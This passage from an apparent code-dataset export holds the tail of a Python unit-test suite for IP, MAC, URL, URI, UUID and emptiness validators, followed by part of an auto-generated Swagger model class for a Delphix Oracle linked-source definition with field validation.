            IPAddress(ipv4=False, ipv6=True).is_valid(
                "2001:0db8:85a3:08d3:1319:8a2e:0370:733T"),
            IPAddress.NOT_IP_ADDRESS,
            "'2001:0db8:85a3:08d3:1319:8a2e:0370:733T' does "
            "not appear to be a valid IP address. Allowed ipv6")

    def test_validate_str_ipv6_too_large_fail(self):
        self._assert_single_error(
            IPAddress(ipv4=False, ipv6=True).is_valid(
                "2001:0db8:85a3:08d3:1319:8a2e:0370:7333:3333:3333"),
            IPAddress.NOT_IP_ADDRESS,
            "'2001:0db8:85a3:08d3:1319:8a2e:0370:7333:3333:3333' does "
            "not appear to be a valid IP address. Allowed ipv6")

    def test_validate_str_ipv6_too_big_fail(self):
        self._assert_single_error(
            IPAddress(ipv4=False, ipv6=True).is_valid(
                "2001:0db8:85a3:08d3:1319:8a2e:0370:7333FFF"),
            IPAddress.NOT_IP_ADDRESS,
            "'2001:0db8:85a3:08d3:1319:8a2e:0370:7333FFF' does "
            "not appear to be a valid IP address. Allowed ipv6")

    def test_validate_str_ipv6_bad_white_spaces_fail(self):
        self._assert_single_error(
            IPAddress(ipv4=False, ipv6=True).is_valid(":0db8:"),
            IPAddress.NOT_IP_ADDRESS,
            "':0db8:' does "
            "not appear to be a valid IP address. Allowed ipv6")

    def test_validate_str_ipv4_not_allowed_fail(self):
        self._assert_single_error(
            IPAddress(ipv4=False, ipv6=True).is_valid("192.168.2.233"),
            IPAddress.IPV4_NOT_ALLOWED,
            "'192.168.2.233' is an ipv4 address that is not allowed. Allowed ipv6")

    def test_validate_str_ipv4_ipv6_using_ipv4_success(self):
        self.assertTrue(IPAddress(ipv4=True, ipv6=True).is_valid("192.168.2.2"))

    def test_validate_str_ipv4_ipv6_using_ipv6_success(self):
        self.assertTrue(IPAddress(ipv4=True, ipv6=True).is_valid(
            "2001:0db8:85a3:08d3:1319:8a2e:0370:7334"))

    def test_validate_str_ipv4_ipv6_using_ipv6_reduced_success(self):
        self.assertTrue(IPAddress(ipv4=True, ipv6=True).is_valid(
            "2001:0db8:85a3::8a2e:0370:7334"))

    def test_validate_str_ipv4_ipv6_using_wrong_ipv4_fail(self):
        self._assert_single_error(
            IPAddress(ipv4=True, ipv6=True).is_valid("192.168.2.277"),
            IPAddress.NOT_IP_ADDRESS,
            "'192.168.2.277' does not appear to be a valid IP address. Allowed ipv4 and ipv6")

    def test_validate_str_ipv4_ipv6_using_wrong_ipv6_fail(self):
        self._assert_single_error(
            IPAddress(ipv4=True, ipv6=True).is_valid(
                "2001:0db8:85a3:08d3:1319:8a2e:0370:733T"),
            IPAddress.NOT_IP_ADDRESS,
            "'2001:0db8:85a3:08d3:1319:8a2e:0370:733T' does not "
            "appear to be a valid IP address. Allowed ipv4 and ipv6")

    def test_validate_int_fail(self):
        self._assert_single_error(
            IPAddress(ipv4=True, ipv6=True).is_valid(2323),
            IPAddress.NOT_IP_ADDRESS,
            "'2323' does not appear to be a valid IP address. Allowed ipv4 and ipv6")

    def test_bad_definition(self):
        # Disallowing both families leaves nothing to validate against.
        with self.assertRaises(ValueError):
            self.validator = IPAddress(ipv4=False, ipv6=False)
class TestMacAddress(TestCase):
    """Tests for the MacAddress validator."""

    def setUp(self):
        self.validator = MacAddress()

    def tearDown(self):
        pass

    def _assert_invalid_mac(self, candidate):
        # A rejected value yields a single INVALID_MAC_ADDRESS error.
        result = self.validator.is_valid(candidate)
        self.assertFalse(result)
        errors = result.error_messages
        self.assertEqual(1, len(errors))
        self.assertEqual(MacAddress.INVALID_MAC_ADDRESS, errors[0].code)
        self.assertEqual("'{}' is not a valid mac address.".format(candidate),
                         errors[0].msg)

    def test_validate_str_success(self):
        self.assertTrue(self.validator.is_valid("01:23:45:67:89:ab"))

    def test_validate_str_fail(self):
        self._assert_invalid_mac("aarrbba@sas.c")

    def test_validate_int_fail(self):
        self._assert_invalid_mac(4)
class TestURL(TestCase):
    """Tests for the URL validator (TLD requirement and composed schemes)."""

    def setUp(self):
        self.validator = URL()

    def tearDown(self):
        pass

    def _assert_invalid_url(self, candidate):
        # A rejected value yields a single INVALID_URL error naming the value.
        result = self.validator.is_valid(candidate)
        self.assertFalse(result)
        errors = result.error_messages
        self.assertEqual(1, len(errors))
        self.assertEqual(URL.INVALID_URL, errors[0].code)
        self.assertEqual("'{}' is not a valid url.".format(candidate),
                         errors[0].msg)

    def test_validate_str_required_tld_http_success(self):
        self.assertTrue(self.validator.is_valid("http://www.google.com"))

    def test_validate_str_required_tld_git_success(self):
        self.assertTrue(self.validator.is_valid("git://github.com"))

    def test_validate_str_no_protocol_fail(self):
        self._assert_invalid_url("google.com")

    def test_validate_int_fail(self):
        self._assert_invalid_url(4)

    def test_validate_str_not_required_tld_http_success(self):
        self.assertTrue(URL(require_tld=False).is_valid("http://google"))

    def test_validate_str_not_required_tld_git_success(self):
        self.assertTrue(URL(require_tld=False).is_valid("git://github"))

    def test_validate_str_not_required_tld_s3_success(self):
        self.assertTrue(URL(require_tld=False).is_valid("s3://my_bucket"))

    def test_validate_str_composed_scheme_plus_success(self):
        self.assertTrue(self.validator.is_valid("git+ssh://github.com"))

    def test_validate_str_composed_scheme_colon_success(self):
        self.assertTrue(self.validator.is_valid("jdbc:postgresql://mydb.com"))
class TestURI(TestCase):
    """Tests for the URI validator (schemes, composed schemes, host-less forms)."""

    def setUp(self):
        self.validator = URI()

    def tearDown(self):
        pass

    def _assert_invalid_uri(self, candidate):
        # A rejected value yields a single INVALID_URI error naming the value.
        result = self.validator.is_valid(candidate)
        self.assertFalse(result)
        errors = result.error_messages
        self.assertEqual(1, len(errors))
        self.assertEqual(URI.INVALID_URI, errors[0].code)
        self.assertEqual("'{}' is not a valid uri.".format(candidate),
                         errors[0].msg)

    def test_validate_str_http_success(self):
        self.assertTrue(self.validator.is_valid("http://www.google.com"))

    def test_validate_str_s3_success(self):
        self.assertTrue(self.validator.is_valid("s3://www.google.com"))

    def test_validate_str_required_tld_git_success(self):
        self.assertTrue(self.validator.is_valid("git://github.com"))

    def test_validate_str_no_protocol_fail(self):
        self._assert_invalid_uri("google.com")

    def test_validate_int_fail(self):
        self._assert_invalid_uri(4)

    def test_validate_str_not_required_tld_http_success(self):
        # NOTE(review): this test (and the next) swaps in a URL validator,
        # not URI — presumably copied from TestURL; confirm whether URI
        # should be exercised here instead.
        self.validator = URL(require_tld=False)
        self.assertTrue(self.validator.is_valid("http://google"))

    def test_validate_str_not_required_tld_git_success(self):
        # NOTE(review): uses URL, not URI — see note above in this method's twin.
        self.validator = URL(require_tld=False)
        self.assertTrue(self.validator.is_valid("git://github"))

    def test_validate_str_composed_scheme_plus_success(self):
        self.assertTrue(self.validator.is_valid("git+ssh://github.com/sdss"))

    def test_validate_str_composed_scheme_colon_success(self):
        self.assertTrue(self.validator.is_valid("jdbc:postgresql://mydb.com/dcdgfd"))

    def test_validate_str_composed_scheme_plus_no_host_success(self):
        self.assertTrue(self.validator.is_valid("hdfs+csv:///sdss"))

    def test_validate_str_composed_scheme_plus_no_host_2_success(self):
        self.assertTrue(self.validator.is_valid("hdfs+csv:/sdss"))
class TestUUID(TestCase):
    """Tests for the UUID validator."""

    def setUp(self):
        self.validator = UUID()

    def tearDown(self):
        pass

    def _assert_invalid_uuid(self, candidate):
        # A rejected value yields a single INVALID_UUID error naming the value.
        result = self.validator.is_valid(candidate)
        self.assertFalse(result)
        errors = result.error_messages
        self.assertEqual(1, len(errors))
        self.assertEqual(UUID.INVALID_UUID, errors[0].code)
        self.assertEqual("'{}' is not a valid UUID.".format(candidate),
                         errors[0].msg)

    def test_validate_str_success(self):
        self.assertTrue(
            self.validator.is_valid("550e8400-e29b-41d4-a716-446655440000"))

    def test_validate_str_fail(self):
        self._assert_invalid_uuid("aarrbbaaaa@sas.c")

    def test_validate_int_fail(self):
        self._assert_invalid_uuid(4)
class TestAnyOf(TestCase):
    """Tests for the AnyOf validator (value must be one of the allowed values)."""

    def setUp(self):
        self.validator = AnyOf(values=[1, "2", "aaas", "ouch"])

    def tearDown(self):
        pass

    def _assert_not_in_list(self, candidate, msg):
        # A rejected value yields a single NOT_IN_LIST error.
        result = self.validator.is_valid(candidate)
        self.assertFalse(result)
        errors = result.error_messages
        self.assertEqual(1, len(errors))
        self.assertEqual(AnyOf.NOT_IN_LIST, errors[0].code)
        self.assertEqual(msg, errors[0].msg)

    def test_validate_str_success(self):
        self.assertTrue(self.validator.is_valid("aaas"))

    def test_validate_int_success(self):
        self.assertTrue(self.validator.is_valid(1))

    def test_validate_str_fail(self):
        self._assert_not_in_list(
            'lass', "'lass' is none of 1, '2', 'aaas', 'ouch'.")

    def test_validate_int_as_str_fail(self):
        self._assert_not_in_list(
            4, "'4' is none of 1, '2', 'aaas', 'ouch'.")
class TestNoneOf(TestCase):
    """Tests for the NoneOf validator (value must not be in the forbidden set)."""

    def setUp(self):
        self.validator = NoneOf(values=[1, "2", "aaas", "ouch"])

    def tearDown(self):
        pass

    def test_validate_str_success(self):
        self.assertTrue(self.validator.is_valid("aaaaaas"))

    def test_validate_int_success(self):
        self.assertTrue(self.validator.is_valid(9))

    def test_validate_int_as_str_success(self):
        # int 2 is distinct from str "2", so it is accepted.
        self.assertTrue(self.validator.is_valid(2))

    def test_validate_str_fail(self):
        outcome = self.validator.is_valid("ouch")
        self.assertFalse(outcome)
        errors = outcome.error_messages
        self.assertEqual(1, len(errors))
        self.assertEqual(NoneOf.IN_LIST, errors[0].code)
        self.assertEqual("'ouch' is one of 1, '2', 'aaas', 'ouch'.",
                         errors[0].msg)
class TestEmpty(TestCase):
    """Tests for the IsEmpty validator."""

    def setUp(self):
        self.validator = IsEmpty()

    def test_validate_str_empty(self):
        self.assertTrue(self.validator.is_valid(""))

    def test_validate_class_empty(self):
        # Any object reporting a zero length counts as empty.
        class ZeroLength:
            def __len__(self):
                return 0
        self.assertTrue(self.validator.is_valid(ZeroLength()))

    def test_validate_not_empty_class(self):
        class NotEmptyClass:
            def __repr__(self):
                return "NotEmptyClass"
        outcome = self.validator.is_valid(NotEmptyClass())
        self.assertFalse(outcome)
        errors = outcome.error_messages
        self.assertEqual(1, len(errors))
        self.assertEqual(IsEmpty.EMPTY, errors[0].code)
        self.assertEqual("'NotEmptyClass' must be empty", errors[0].msg)

    def test_validate_none_ok(self):
        self.assertTrue(self.validator.is_valid(None))

    def test_float_ok(self):
        self.assertTrue(self.validator.is_valid(0.0))
class TestNotEmpty(TestCase):
    """Tests for the NotEmpty validator."""

    def setUp(self):
        self.validator = NotEmpty()

    def test_validate_str_empty(self):
        outcome = self.validator.is_valid('')
        self.assertFalse(outcome)
        errors = outcome.error_messages
        self.assertEqual(1, len(errors))
        self.assertEqual(NotEmpty.NOT_EMPTY, errors[0].code)
        self.assertEqual("Value can not be empty", errors[0].msg)

    def test_validate_class_empty(self):
        # Any object reporting a zero length is rejected.
        class ZeroLength:
            def __len__(self):
                return 0
        self.assertFalse(self.validator.is_valid(ZeroLength()))

    def test_validate_not_empty_class(self):
        class Plain:
            pass
        self.assertTrue(self.validator.is_valid(Plain()))

    def test_validate_none_raises(self):
        self.assertFalse(self.validator.is_valid(None))

    def test_float_raises(self):
        self.assertFalse(self.validator.is_valid(0.0))
class TestNotEmptyString(TestCase):
    """Tests for the NotEmptyString validator."""

    def setUp(self):
        self.validator = NotEmptyString()

    def _assert_single_error(self, result, code, msg):
        # Every failure case carries exactly one error message.
        self.assertFalse(result)
        self.assertEqual(1, len(result.error_messages))
        self.assertEqual(code, result.error_messages[0].code)
        self.assertEqual(msg, result.error_messages[0].msg)

    def test_validate_str_empty(self):
        self._assert_single_error(self.validator.is_valid(''),
                                  NotEmptyString.NOT_EMPTY,
                                  "Value can not be empty")

    def test_validate_str_more_whites_empty(self):
        # Whitespace-only input is treated as empty.
        self._assert_single_error(self.validator.is_valid(" "),
                                  NotEmptyString.NOT_EMPTY,
                                  "Value can not be empty")

    def test_validate_not_str(self):
        self._assert_single_error(self.validator.is_valid(3),
                                  NotEmptyString.NOT_STRING,
                                  "Value must be a string")

    def test_validate_not_empty(self):
        self.assertTrue(self.validator.is_valid("Batman"))
class TestIsNone(TestCase):
    """Tests for the IsNone validator."""

    def setUp(self):
        self.validator = IsNone()

    def test_validate_str_empty(self):
        outcome = self.validator.is_valid("")
        self.assertFalse(outcome)
        errors = outcome.error_messages
        self.assertEqual(1, len(errors))
        self.assertEqual(IsNone.NONE, errors[0].code)
        self.assertEqual("'' must be None", errors[0].msg)

    def test_validate_class_empty(self):
        # A zero-length object is still not None, so it is rejected.
        class ZeroLength:
            def __len__(self):
                return 0
        self.assertFalse(self.validator.is_valid(ZeroLength()))

    def test_validate_none(self):
        self.assertTrue(self.validator.is_valid(None))

    def test_float_raises(self):
        self.assertFalse(self.validator.is_valid(0.0))
class TestIsNotNone(TestCase):
    """Tests for the NotNone validator."""

    def setUp(self):
        self.validator = NotNone()

    def test_validate_none_raises(self):
        outcome = self.validator.is_valid(None)
        self.assertFalse(outcome)
        errors = outcome.error_messages
        self.assertEqual(1, len(errors))
        self.assertEqual(NotNone.NOT_NONE, errors[0].code)
        # Expected text comes from the validator's own message table.
        self.assertEqual(NotNone.error_messages[NotNone.NOT_NONE],
                         errors[0].msg)

    def test_empty_class_ok(self):
        # A zero-length object is not None, so it passes.
        class ZeroLength:
            def __len__(self):
                return 0
        self.assertTrue(self.validator.is_valid(ZeroLength()))
| 38.772109
| 112
| 0.663187
| 4,272
| 34,197
| 5.094101
| 0.060861
| 0.101553
| 0.137947
| 0.129032
| 0.923123
| 0.899917
| 0.847716
| 0.822259
| 0.770563
| 0.745474
| 0
| 0.031589
| 0.224259
| 34,197
| 881
| 113
| 38.816118
| 0.788752
| 0
| 0
| 0.636501
| 0
| 0.006033
| 0.107933
| 0.020002
| 0
| 0
| 0
| 0
| 0.420814
| 1
| 0.223228
| false
| 0.0181
| 0.004525
| 0.007541
| 0.27451
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
df16a1c16d19f9cb922e7aba8565542632aa63d4
| 24,231
|
py
|
Python
|
src/generated/definitions/linked_source_definition.py
|
shivam5489/test
|
7461db55bcf44ecf70a30812620ed012ffecf80a
|
[
"Apache-2.0"
] | null | null | null |
src/generated/definitions/linked_source_definition.py
|
shivam5489/test
|
7461db55bcf44ecf70a30812620ed012ffecf80a
|
[
"Apache-2.0"
] | null | null | null |
src/generated/definitions/linked_source_definition.py
|
shivam5489/test
|
7461db55bcf44ecf70a30812620ed012ffecf80a
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2019 by Delphix. All rights reserved.
#
from __future__ import absolute_import
from datetime import date, datetime
from generated.definitions.base_model_ import (
Model, GeneratedClassesError, GeneratedClassesTypeError)
from generated.definitions.virtual_source_definition_custom_init_params import VirtualSourceDefinitionCustomInitParams
import re
from generated import util
class LinkedSourceDefinition(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, username='', mount_path='', dbid='', custom_init_params_file='', custom_init_params=None, rman_channels=None, dbctrlbkppiece='', password='', instance_name='', dbrmanbkploc='', validate=True):
    """LinkedSourceDefinition - a model defined in Swagger. The type of some of these
    attributes can be defined as a List[ERRORUNKNOWN]. This just means they
    are a list of any type.

    :param username: The username of this LinkedSourceDefinition.
    :type username: str
    :param mount_path: The mount_path of this LinkedSourceDefinition.
    :type mount_path: str
    :param dbid: The dbid of this LinkedSourceDefinition.
    :type dbid: str
    :param custom_init_params_file: The custom_init_params_file of this LinkedSourceDefinition.
    :type custom_init_params_file: str
    :param custom_init_params: The custom_init_params of this LinkedSourceDefinition.
    :type custom_init_params: List[VirtualSourceDefinitionCustomInitParams]
    :param rman_channels: The rman_channels of this LinkedSourceDefinition.
    :type rman_channels: int
    :param dbctrlbkppiece: The dbctrlbkppiece of this LinkedSourceDefinition.
    :type dbctrlbkppiece: str
    :param password: The password of this LinkedSourceDefinition.
    :type password: str
    :param instance_name: The instance_name of this LinkedSourceDefinition.
    :type instance_name: str
    :param dbrmanbkploc: The dbrmanbkploc of this LinkedSourceDefinition.
    :type dbrmanbkploc: str
    :param validate: If the validation should be done during init. This
        should only be called internally when calling from_dict.
    :type validate: bool
    :raises GeneratedClassesError: when validate is True and a required
        parameter is None, or when a value violates its regex pattern
        (pattern checks below are NOT gated on ``validate``).
    """
    # Attribute name -> expected Python type, consumed by the type checks below.
    self.swagger_types = {
        'username': str,
        'mount_path': str,
        'dbid': str,
        'custom_init_params_file': str,
        'custom_init_params': util.convert_type('List[VirtualSourceDefinitionCustomInitParams]'),
        'rman_channels': int,
        'dbctrlbkppiece': str,
        'password': str,
        'instance_name': str,
        'dbrmanbkploc': str
    }
    # Attribute name -> JSON key used in the Swagger document.
    self.attribute_map = {
        'username': 'username',
        'mount_path': 'mountPath',
        'dbid': 'dbid',
        'custom_init_params_file': 'customInitParamsFile',
        'custom_init_params': 'customInitParams',
        'rman_channels': 'rmanChannels',
        'dbctrlbkppiece': 'dbctrlbkppiece',
        'password': 'password',
        'instance_name': 'instanceName',
        'dbrmanbkploc': 'dbrmanbkploc'
    }
    # NOTE: type_error is computed unconditionally below but only raised
    # when validate is True; the regex pattern checks, by contrast, raise
    # regardless of the validate flag.
    # Validating the attribute username and then saving it.
    if validate and username is None:
        raise GeneratedClassesError(
            "The required parameter 'username' must not be 'None'.")
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'username',
                                                      username,
                                                      str,
                                                      True)
    if validate and type_error:
        raise type_error
    self._username = username
    # Validating the attribute mount_path and then saving it.
    if validate and mount_path is None:
        raise GeneratedClassesError(
            "The required parameter 'mount_path' must not be 'None'.")
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'mount_path',
                                                      mount_path,
                                                      str,
                                                      True)
    if validate and type_error:
        raise type_error
    self._mount_path = mount_path
    # Validating the attribute dbid and then saving it.
    if validate and dbid is None:
        raise GeneratedClassesError(
            "The required parameter 'dbid' must not be 'None'.")
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'dbid',
                                                      dbid,
                                                      str,
                                                      True)
    if validate and type_error:
        raise type_error
    # dbid must be empty or all digits.
    if (dbid is not None
            and not re.search('^$|^[0-9]*$', dbid)):
        raise GeneratedClassesError(
            "Invalid value for 'dbid', was '{}' but must follow the"
            " pattern '^$|^[0-9]*$'.".format(dbid))
    self._dbid = dbid
    # Validating the attribute custom_init_params_file and then saving it.
    # Optional attribute: no None check is performed.
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'custom_init_params_file',
                                                      custom_init_params_file,
                                                      str,
                                                      False)
    if validate and type_error:
        raise type_error
    self._custom_init_params_file = custom_init_params_file
    # Validating the attribute custom_init_params and then saving it.
    # The list type and its element type are resolved via util helpers.
    expected_type = util.convert_type('List[VirtualSourceDefinitionCustomInitParams]')
    element_type = util.get_contained_type('List[VirtualSourceDefinitionCustomInitParams]')
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'custom_init_params',
                                                      custom_init_params,
                                                      expected_type,
                                                      False,
                                                      element_type)
    if validate and type_error:
        raise type_error
    self._custom_init_params = custom_init_params
    # Validating the attribute rman_channels and then saving it.
    # Optional attribute: no None check is performed.
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'rman_channels',
                                                      rman_channels,
                                                      int,
                                                      False)
    if validate and type_error:
        raise type_error
    self._rman_channels = rman_channels
    # Validating the attribute dbctrlbkppiece and then saving it.
    if validate and dbctrlbkppiece is None:
        raise GeneratedClassesError(
            "The required parameter 'dbctrlbkppiece' must not be 'None'.")
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'dbctrlbkppiece',
                                                      dbctrlbkppiece,
                                                      str,
                                                      True)
    if validate and type_error:
        raise type_error
    # dbctrlbkppiece must contain no whitespace.
    if (dbctrlbkppiece is not None
            and not re.search('^$|^[^\\s]*$', dbctrlbkppiece)):
        raise GeneratedClassesError(
            "Invalid value for 'dbctrlbkppiece', was '{}' but must follow the"
            " pattern '^$|^[^\\s]*$'.".format(dbctrlbkppiece))
    self._dbctrlbkppiece = dbctrlbkppiece
    # Validating the attribute password and then saving it.
    if validate and password is None:
        raise GeneratedClassesError(
            "The required parameter 'password' must not be 'None'.")
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'password',
                                                      password,
                                                      str,
                                                      True)
    if validate and type_error:
        raise type_error
    self._password = password
    # Validating the attribute instance_name and then saving it.
    if validate and instance_name is None:
        raise GeneratedClassesError(
            "The required parameter 'instance_name' must not be 'None'.")
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'instance_name',
                                                      instance_name,
                                                      str,
                                                      True)
    if validate and type_error:
        raise type_error
    self._instance_name = instance_name
    # Validating the attribute dbrmanbkploc and then saving it.
    if validate and dbrmanbkploc is None:
        raise GeneratedClassesError(
            "The required parameter 'dbrmanbkploc' must not be 'None'.")
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'dbrmanbkploc',
                                                      dbrmanbkploc,
                                                      str,
                                                      True)
    if validate and type_error:
        raise type_error
    # dbrmanbkploc must contain no whitespace.
    if (dbrmanbkploc is not None
            and not re.search('^$|^[^\\s]*$', dbrmanbkploc)):
        raise GeneratedClassesError(
            "Invalid value for 'dbrmanbkploc', was '{}' but must follow the"
            " pattern '^$|^[^\\s]*$'.".format(dbrmanbkploc))
    self._dbrmanbkploc = dbrmanbkploc
@classmethod
def from_dict(cls, dikt):
    """Returns the dict as a model.

    :param dikt: A dict.
    :type: dict
    :return: The linkedSourceDefinition of this LinkedSourceDefinition.
    :rtype: LinkedSourceDefinition
    """
    # Deserialization (including attribute_map key translation) is
    # delegated to the shared util helper.
    return util.deserialize_model(dikt, cls)
@property
def username(self):
    """Gets the username of this LinkedSourceDefinition.

    Oracle User Name

    :return: The username of this LinkedSourceDefinition.
    :rtype: str
    """
    return self._username

@username.setter
def username(self, username):
    """Sets the username of this LinkedSourceDefinition.

    Oracle User Name

    :param username: The username of this LinkedSourceDefinition.
    :type username: str
    :raises GeneratedClassesError: if ``username`` is None (required field).
    :raises: the error returned by GeneratedClassesTypeError.type_error
        when ``username`` is not a str.
    """
    # Validating the attribute username and then saving it.
    if username is None:
        raise GeneratedClassesError(
            "The required parameter 'username' must not be 'None'.")
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'username',
                                                      username,
                                                      str,
                                                      True)
    if type_error:
        raise type_error
    self._username = username
@property
def mount_path(self):
    """Gets the mount_path of this LinkedSourceDefinition.

    Where to mount storage onto the staging host while syncing

    :return: The mount_path of this LinkedSourceDefinition.
    :rtype: str
    """
    return self._mount_path

@mount_path.setter
def mount_path(self, mount_path):
    """Sets the mount_path of this LinkedSourceDefinition.

    Where to mount storage onto the staging host while syncing

    :param mount_path: The mount_path of this LinkedSourceDefinition.
    :type mount_path: str
    :raises GeneratedClassesError: if ``mount_path`` is None (required field).
    :raises: the error returned by GeneratedClassesTypeError.type_error
        when ``mount_path`` is not a str.
    """
    # Validating the attribute mount_path and then saving it.
    if mount_path is None:
        raise GeneratedClassesError(
            "The required parameter 'mount_path' must not be 'None'.")
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'mount_path',
                                                      mount_path,
                                                      str,
                                                      True)
    if type_error:
        raise type_error
    self._mount_path = mount_path
@property
def dbid(self):
    """Gets the dbid of this LinkedSourceDefinition.

    :return: The dbid of this LinkedSourceDefinition.
    :rtype: str
    """
    return self._dbid

@dbid.setter
def dbid(self, dbid):
    """Sets the dbid of this LinkedSourceDefinition.

    :param dbid: The dbid of this LinkedSourceDefinition.
    :type dbid: str
    :raises GeneratedClassesError: if ``dbid`` is None (required field) or
        if it is not empty / all-digits (pattern '^$|^[0-9]*$').
    :raises: the error returned by GeneratedClassesTypeError.type_error
        when ``dbid`` is not a str.
    """
    # Validating the attribute dbid and then saving it.
    if dbid is None:
        raise GeneratedClassesError(
            "The required parameter 'dbid' must not be 'None'.")
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'dbid',
                                                      dbid,
                                                      str,
                                                      True)
    if type_error:
        raise type_error
    # dbid must be empty or consist only of digits.
    if (dbid is not None
            and not re.search('^$|^[0-9]*$', dbid)):
        raise GeneratedClassesError(
            "Invalid value for 'dbid', was '{}' but must follow the"
            " pattern '^$|^[0-9]*$'.".format(dbid))
    self._dbid = dbid
@property
def custom_init_params_file(self):
    """Gets the custom_init_params_file of this LinkedSourceDefinition.

    Each line in file, parameter=value

    :return: The custom_init_params_file of this LinkedSourceDefinition.
    :rtype: str
    """
    return self._custom_init_params_file

@custom_init_params_file.setter
def custom_init_params_file(self, custom_init_params_file):
    """Sets the custom_init_params_file of this LinkedSourceDefinition.

    Each line in file, parameter=value

    :param custom_init_params_file: The custom_init_params_file of this LinkedSourceDefinition.
    :type custom_init_params_file: str
    :raises: the error returned by GeneratedClassesTypeError.type_error
        when the value is not a str. Unlike required fields, None is not
        explicitly rejected here (optional field).
    """
    # Validating the attribute custom_init_params_file and then saving it.
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'custom_init_params_file',
                                                      custom_init_params_file,
                                                      str,
                                                      False)
    if type_error:
        raise type_error
    self._custom_init_params_file = custom_init_params_file
@property
def custom_init_params(self):
    """Gets the custom_init_params of this LinkedSourceDefinition.

    :return: The custom_init_params of this LinkedSourceDefinition.
    :rtype: List[VirtualSourceDefinitionCustomInitParams]
    """
    return self._custom_init_params

@custom_init_params.setter
def custom_init_params(self, custom_init_params):
    """Sets the custom_init_params of this LinkedSourceDefinition.

    :param custom_init_params: The custom_init_params of this LinkedSourceDefinition.
    :type custom_init_params: List[VirtualSourceDefinitionCustomInitParams]
    :raises: the error returned by GeneratedClassesTypeError.type_error
        when the value does not match the expected list/element types.
    """
    # Validating the attribute custom_init_params and then saving it.
    # Container and element types are resolved via the util helpers.
    expected_type = util.convert_type('List[VirtualSourceDefinitionCustomInitParams]')
    element_type = util.get_contained_type('List[VirtualSourceDefinitionCustomInitParams]')
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'custom_init_params',
                                                      custom_init_params,
                                                      expected_type,
                                                      False,
                                                      element_type)
    if type_error:
        raise type_error
    self._custom_init_params = custom_init_params
@property
def rman_channels(self):
    """Gets the rman_channels of this LinkedSourceDefinition.

    RMAN channels for restore

    :return: The rman_channels of this LinkedSourceDefinition.
    :rtype: int
    """
    return self._rman_channels

@rman_channels.setter
def rman_channels(self, rman_channels):
    """Sets the rman_channels of this LinkedSourceDefinition.

    RMAN channels for restore

    :param rman_channels: The rman_channels of this LinkedSourceDefinition.
    :type rman_channels: int
    :raises: the error returned by GeneratedClassesTypeError.type_error
        when the value is not an int. No explicit None check (optional field).
    """
    # Validating the attribute rman_channels and then saving it.
    type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
                                                      'rman_channels',
                                                      rman_channels,
                                                      int,
                                                      False)
    if type_error:
        raise type_error
    self._rman_channels = rman_channels
@property
def dbctrlbkppiece(self):
    """Gets the dbctrlbkppiece of this LinkedSourceDefinition.

    :return: The dbctrlbkppiece of this LinkedSourceDefinition.
    :rtype: str
    """
    # Read-only view of the backing field; validation happens in the setter.
    return self._dbctrlbkppiece
@dbctrlbkppiece.setter
def dbctrlbkppiece(self, dbctrlbkppiece):
    """Sets the dbctrlbkppiece of this LinkedSourceDefinition.

    :param dbctrlbkppiece: The dbctrlbkppiece of this LinkedSourceDefinition.
    :type dbctrlbkppiece: str
    """
    # Required attribute: reject a missing value up front.
    if dbctrlbkppiece is None:
        raise GeneratedClassesError(
            "The required parameter 'dbctrlbkppiece' must not be 'None'.")
    # Shared validator returns an exception instance (or None); raise it here.
    error = GeneratedClassesTypeError.type_error(
        LinkedSourceDefinition, 'dbctrlbkppiece', dbctrlbkppiece, str, True)
    if error:
        raise error
    # Value must contain no whitespace. (None was already rejected above,
    # so no separate None re-check is needed before the pattern match.)
    if not re.search('^$|^[^\\s]*$', dbctrlbkppiece):
        raise GeneratedClassesError(
            "Invalid value for 'dbctrlbkppiece', was '{}' but must follow the"
            " pattern '^$|^[^\\s]*$'.".format(dbctrlbkppiece))
    self._dbctrlbkppiece = dbctrlbkppiece
@property
def password(self):
    """Gets the password of this LinkedSourceDefinition.

    Oracle User Password

    :return: The password of this LinkedSourceDefinition.
    :rtype: str
    """
    # Read-only view of the backing field; validation happens in the setter.
    return self._password
@password.setter
def password(self, password):
    """Sets the password of this LinkedSourceDefinition.

    Oracle User Password

    :param password: The password of this LinkedSourceDefinition.
    :type password: str
    """
    # Required attribute: reject a missing value up front.
    if password is None:
        raise GeneratedClassesError(
            "The required parameter 'password' must not be 'None'.")
    # Shared validator returns an exception instance (or None); raise it here.
    error = GeneratedClassesTypeError.type_error(
        LinkedSourceDefinition, 'password', password, str, True)
    if error:
        raise error
    self._password = password
@property
def instance_name(self):
    """Gets the instance_name of this LinkedSourceDefinition.

    Staging Instance Name

    :return: The instance_name of this LinkedSourceDefinition.
    :rtype: str
    """
    # Read-only view of the backing field; validation happens in the setter.
    return self._instance_name
@instance_name.setter
def instance_name(self, instance_name):
    """Sets the instance_name of this LinkedSourceDefinition.

    Staging Instance Name

    :param instance_name: The instance_name of this LinkedSourceDefinition.
    :type instance_name: str
    """
    # Required attribute: reject a missing value up front.
